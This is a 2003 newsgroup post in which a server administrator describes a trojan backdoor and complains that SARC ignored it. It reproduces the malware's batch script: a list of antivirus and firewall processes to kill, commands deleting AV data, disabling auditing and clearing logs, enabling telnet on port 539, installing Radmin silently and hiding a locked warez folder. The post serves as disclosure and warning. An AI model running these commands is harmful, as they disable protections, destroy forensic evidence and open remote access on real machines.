From kfarmer@thuban.org (Keith Farmer)
Newsgroups alt.comp.virus
Subject VERY NASTY TROJAN -- SARC refuses to recognize it (long write-up)
NNTP-Posting-Host 67.126.144.68
Message-ID <6d668d6.0306031252.1e301208@posting.google.com>
 
SARC refuses to recognize this as a threat. So I'm spreading this where I may
 
Just spent the day reinstalling a server. NAV missed one. Not merely that, but when brought to SARC's attention, they dismissed it.
They're losing a customer over this.
 
Turns out we had a backdoor hacked onto our system. Considering the system was fairly newly installed, we don't know if it got in through a WebDAV flaw or not, before the appropriate patches were installed.
Either way, here's what it did
 
1) installed a hacked copy of the Serv-U ftp server.
 
This seems to contain a dictionary. Why would an ftp server contain a dictionary? SARC seems to think nothing of it.
 
2) created and REALLY REALLY LOCKED a couple directories to be used as dumping points for dvd rips. Administrator couldn't even change the access control.
 
3) replaced my system32/services.exe file with a hacked version.
 
If you bother to open the modified services.exe file in a bytecode editor (such as UltraEdit, something with SARC apparently didn't bother with), you see the following, at the very beginning -- "Use Win32 instead dumpass haha rofl!" and, at the end, "idontlikethosenastyavproggiesbelievemeidontlikethem" (repeats omitted). The legitimate file from Microsoft contains none of this.
It took us less than a minute to find these, as we're not the ones trained in it.
 
For some reason, SARC doesn't seem to think this is a sign that something's been altered in a system file. Obviously, someone at SARC is not doing their job.
 
4) installed MOAB.BAT and .EXE.
 
For some reason, attempts to forward this to SARC are failing. I wonder if they blocked my account. I'm certainly not going to pay for a phone call to their tech support just because they refused to listen to me. I'll just give my business elsewhere in that case. Hence, this posting.
 
5) Modified registry security, policy, you name it. For this reason alone, we reformatted and reinstalled.
 
6) Ports to watch out for, surprise surprise, include port 1337, as well as 2277 (a remote admin backdoor), and 539 (dec or hex, I don't know).
 
7) It will stop and/or delete the following AV and firewall services
 
_Avp32.exe /y
_Avpcc.exe /y
_Avpm.exe /y
Ackwin32.exe /y
Agnitum Outpost Firewall /y
Anti-Trojan.exe /y
ANTIVIR /y
Apvxdwin.exe /y
ATRACK /y
Autodown.exe /y
AVCONSOL /y
Avconsol.exe /y
Ave32.exe /y
Avgctrl.exe /y
Avkserv.exe /y
Avnt.exe /y
Avp.exe /y
AVP.EXE /y
AVP32 /y
Avp32.exe /y
Avpcc.exe /y
Avpdos32.exe /y
Avpm.exe /y
Avptc32.exe /y
Avpupd.exe /y
Avsched32.exe /y
AVSync Manager /y
AVSYNMGR /y
Avwin95.exe /y
Avwupd32.exe /y
Blackd.exe /y
BLACKICE /y
BlackICE Defender /y
Blackice.exe /y
CA Sessionwall-3 /y
Cfiadmin.exe /y
Cfiaudit.exe /y
CFINET /y
Cfinet.exe /y
CFINET32 /y
Cfinet32.exe /y
Claw95.exe /y
Claw95cf.exe /y
Cleaner.exe /y
Cleaner3.exe /y
ConSeal PC Firewall & Private Desktop /y
Defwatch /y
Defwatch.exe /y
Dvp95.exe /y
Dvp95_0.exe /y
Ecengine.exe /y
eSafe Protect Desktop /y
Esafe.exe /y
Espwatch.exe /y
eTrust EZ Firewall /y
F-Agnt95.exe /y
Findviru.exe /y
Fprot.exe /y
F-Prot.exe /y
F-PROT95 /y
F-Prot95.exe /y
FP-WIN /y
Fp-Win.exe /y
Freedom 2 /y
Frw.exe /y
F-STOPW /y
F-Stopw.exe /y
GNAT Box Lite /y
IAMAPP /y
Iamapp.exe /y
Iamserv.exe /y
Ibmasn.exe /y
Ibmavsp.exe /y
Icload95.exe /y
Icloadnt.exe /y
ICMON /y
Icmon.exe /y
Icsupp95.exe /y
Icsuppnt.exe /y
Iface.exe /y
Internet Alert 99 /y
IOMON98 /y
Iomon98.exe /y
Jedi.exe /y
LOCKDOWN2000 /y
Lockdown2000.exe /y
Look'n'Stop /y
Look'n'Stop Lite /y
Lookout.exe /y
LUALL /y
Luall.exe /y
LUCOMSERVER /y
MCAFEE /y
McAfee Firewall /y
McAfee Internet Guard Dog Pro /y
Moolive.exe /y
Mpftray.exe /y
N32scanw.exe /y
NAVAPSVC /y
NAVAPW32 /y
Navapw32.exe /y
NAVLU32 /y
Navlu32.exe /y
Navnt.exe /y
NAVRUNR /y
NAVW32 /y
Navw32.exe /y
NAVWNT /y
Navwnt.exe /y
NeoWatch /y
NISSERV /y
NISUM /y
Nisum.exe /y
NMAIN /y
Nmain.exe /y
Norman Personal Firewall /y
Normist.exe /y
NORTON /y
Norton AntiVirus Server /y
Norton Internet Security /y
Norton Personal Firewall 2001 /y
Nupgrade.exe /y
NVC95 /y
Nvc95.exe /y
Outpost.exe /y
Padmin.exe /y
Pavcl.exe /y
Pavsched.exe /y
Pavw.exe /y
Pc firewall /y
PC Viper /y
PCCIOMON /y
PCCMAIN /y
PCCWIN98 /y
Pccwin98.exe /y
Pcfwallicon.exe /y
Persfw.exe /y
PGP Gauntlet /y
POP3TRAP /y
Proxy + /y
PVIEW95 /y
Rav7.exe /y
Rav7win.exe /y
Rescue.exe /y
RESCUE32 /y
SAFEWEB /y
Safeweb.exe /y
Scan32.exe /y
Scan95.exe /y
Scanpm.exe /y
Scrscan.exe /y
Serv95.exe /y
Smc.exe /y
SMCSERVICE /y
Snort - Win32 GUI /y
Snort (Intrusion Detection System) /y
Sphinx.exe /y
Sphinxwall /y
Sweep95.exe /y
Sybergen Secure Desktop /y
Sybergen SyGate /y
SYMPROXYSVC /y
Tbscan.exe /y
Tca.exe /y
Tds2-98.exe /y
Tds2-Nt.exe /y
TermiNET /y
TGBBOB /y
Tiny Personal Firewall /y
Vet95.exe /y
Vettray.exe /y
Vscan40.exe /y
Vsecomr.exe /y
VSHWIN32 /y
Vshwin32.exe /y
VSSTAT /y
Vsstat.exe /y
WEBSCANX /y
Webscanx.exe /y
WEBTRAP /y
Wfindv32.exe /y
Wingate /y
WinProxy /y
WinRoute /y
WyvernWorks Firewall /y
Zonealarm /y
Zonealarm.exe /y
AVP32 /y
LOCKDOWN2000 /y
AVP.EXE /y
CFINET32 /y
CFINET /y
ICMON /y
SAFEWEB /y
WEBSCANX /y
ANTIVIR /y
MCAFEE /y
NORTON /y
NVC95 /y
FP-WIN /y
IOMON98 /y
PCCWIN98 /y
F-PROT95 /y
F-STOPW /y
PVIEW95 /y
NAVWNT /y
NAVRUNR /y
NAVLU32 /y
NAVAPSVC /y
NISUM /y
SYMPROXYSVC /y
RESCUE32 /y
NISSERV /y
ATRACK /y
IAMAPP /y
LUCOMSERVER /y
LUALL /y
NMAIN /y
NAVW32 /y
NAVAPW32 /y
VSSTAT /y
VSHWIN32 /y
AVSYNMGR /y
AVCONSOL /y
WEBTRAP /y
POP3TRAP /y
PCCMAIN /y
PCCIOMON /y
del c\*ANTI-VIR*.DAT /s
del c\*CHKLIST*.DAT /s
del c\*CHKLIST*.MS /s
del c\*CHKLIST*.CPS /s
del c\*CHKLIST*.TAV /s
del c\*IVB*.NTZ /s
del c\*SMARTCHK*.MS /s
del c\*SMARTCHK*.CPS /s
del c\*AVGQT*.DAT /s
del c\*AGUARD*.DAT /s
 
8) other associated files
 
attrib +s CommonDlg32.dll
attrib +s drvrquery32.exe
attrib +s clearlogs.exe
attrib +s script.exe
attrib +s auditpol.exe
attrib +s PSKILL.exe
attrib +s REG.exe
attrib +s TLIST.exe
attrib +s uptime.exe
attrib +s SystemInfo.exe
 
del /s winmgnt.exe
del /s servudaemon.exe
del /s servudaemon.ini
copy %windir%\drvrquery32.exe %windir%\system32\ /y
copy %windir%\CommonDlg32.dll %windir%\system32\ /y %windir%\system32\drvrquery32.exe /s %windir%\system32\drvrquery32.exe /h %windir%\system32\drvrquery32.exe /i md %windir%\system32\backup copy %windir%\system32\CommonDlg32.dll %windir%\system32\backup copy %windir%\system32\drvrquery32.exe %windir%\system32\backup
 
echo Windows Registry Editor Version 5.00 > protect.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]
>> protect.reg
echo "DisableWebDAV"=dword00000001 >> protect.reg
regedit /s protect.reg
reg.exe IMPORT protect.reg
del protect.reg
 
net stop R_Server
regedit /s radmin.reg
nvsvc.exe /install /silence
net start R_Server
 
echo Windows Registry Editor Version 5.00 > config.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> config.reg echo "NTLM"=dword00000000 >> config.reg echo "TelnetPort"=dword00000539 >> config.reg regedit.exe /s config.reg del config.reg net start telnet
 
auditpol /disable
del c\*.log /s
del d\*.log /s
clearlogs -app
clearlogs -sys
clearlogs -sec
 
md %windir%\system32\spool\Help\
md %windir%\system32\spool\Help\aux\ \
md %windir%\system32\spool\Help\aux\.tmp\
md %windir%\system32\spool\Help\aux\.tmp\scanfolder
md %windir%\system32\spool\Help\aux\.tmp\warez
cacls %windir%\system32\spool\Help\* /T /E /P AdministratorN attrib +S +H %windir%\system32\spool\Help\aux\.tmp\ /S /D copy login.txt %windir%\system32\spool\Help\aux\.tmp\
 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
>> bp.reg
echo "AutoShareServer"=dword00000000 >> bp.reg
echo "AutoShareWks"=dword00000000 >> bp.reg
regedit /s bp.reg
reg.exe IMPORT bp.reg
del bp.reg